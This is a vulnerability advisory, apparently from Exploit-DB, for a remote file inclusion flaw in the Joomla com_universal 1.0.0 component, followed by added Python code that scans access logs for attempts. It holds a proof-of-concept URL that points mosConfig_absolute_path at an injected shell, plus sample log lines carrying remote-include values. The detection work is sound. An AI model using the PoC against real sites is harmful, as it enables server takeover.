Vendor: Joomla component com_universal (UWCMS Universal Web CMS)
By: eidelweiss
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: Joomla component com_universal (UWCMS Universal Web CMS)
Patch Exists: NO

Joomla component com_universal <= Remote File Inclusion Vulnerability exploit

The Joomla component com_universal (UWCMS Universal Web CMS) version 1.0.0 is vulnerable to remote file inclusion. The flaw is in the 'config.html.php' file, which uses the 'mosConfig_absolute_path' parameter in a require_once() call without properly validating it. An attacker who supplies a malicious URL in the 'mosConfig_absolute_path' parameter can make the server include and execute arbitrary files.

Mitigation:

To mitigate this vulnerability, update the Joomla component com_universal to a patched version that properly validates user input before passing it to require_once().

Exploit-DB raw data:

###########################################################
	Joomla component com_universal <= Remote File Inclusion Vulnerability exploit
###########################################################

[+]Software:	Joomla component com_universal (UWCMS Universal Web CMS)
[+]Version:	1.0.0
[+]License:	http://www.gnu.org/copyleft/gpl.html GNU/GPL
[+]Source:	http://uwcms.sourceforge.net
[+]CWE ID :	98
[+]Security Risk:	High
[+]Remote Exploit:	Yes

###########################################################
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com
[+]Thank`s:	sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[+]Special:	[D]eal [C]yber - syabilla_putri (miss u) , psychotic_girl (dodol :P) , all my friends
###########################################################

-=[ VULN ]=-

[-]	/includes/config/config.html.php

	global $mosConfig_absolute_path;
	require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

-=[ P0C ]=-

	http://127.0.0.1//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

###########################################################
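
For detection, the following Python code (an added example, not part of the advisory or of the component's code) flags access-log requests that set `mosConfig_absolute_path` from the query string, as the PoC above does. It assumes combined-log-format lines; the function names, the verdict labels and the sample log lines (addresses, host names, timestamps) are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "mosConfig_absolute_path"   # variable named in the advisory
SCRIPT = "/administrator/components/com_universal/includes/config/config.html.php"
SCHEME = re.compile(r"^\s*[A-Za-z][A-Za-z0-9+.\-]+:")   # any URI scheme prefix
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (verdict, hits_advisory_script) or None for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    # Split by hand: urlsplit() would read a leading "//" as a host name.
    raw_path, _, query = m.group(1).partition("?")
    path = re.sub(r"/+", "/", unquote(raw_path))
    # parse_qsl percent-decodes names and values, so an encoded parameter
    # name (mosConfig%5Fabsolute%5Fpath) is matched too. PHP variable names
    # are case-sensitive, hence the exact comparison.
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == PARAM]
    if not values:
        return None
    verdict = "rfi-attempt" if any(SCHEME.match(v) for v in values) else "param-override"
    return verdict, path.endswith(SCRIPT)

def scan(lines):
    """Return [(line_number, verdict, hits_advisory_script)] for flagged lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample input (not real traffic); hosts use the reserved .invalid TLD.
PREFIX = '203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET '
SAMPLE_LOG = [
    PREFIX + "/" + SCRIPT + "?" + PARAM + '=http://host.example.invalid/a.txt? HTTP/1.1" 200 512',
    PREFIX + SCRIPT + '?mosConfig%5Fabsolute%5Fpath=HTTP%3A%2F%2Fhost.example.invalid%2Fa.txt HTTP/1.1" 200 512',
    PREFIX + '/index.php?option=com_universal&Itemid=3 HTTP/1.1" 200 9120',
    PREFIX + "/index.php?" + PARAM + '=/var/www HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `param-override` verdict marks a request that sets the variable to a local-looking value; normal site traffic has no reason to send this parameter, so those lines are still worth reviewing.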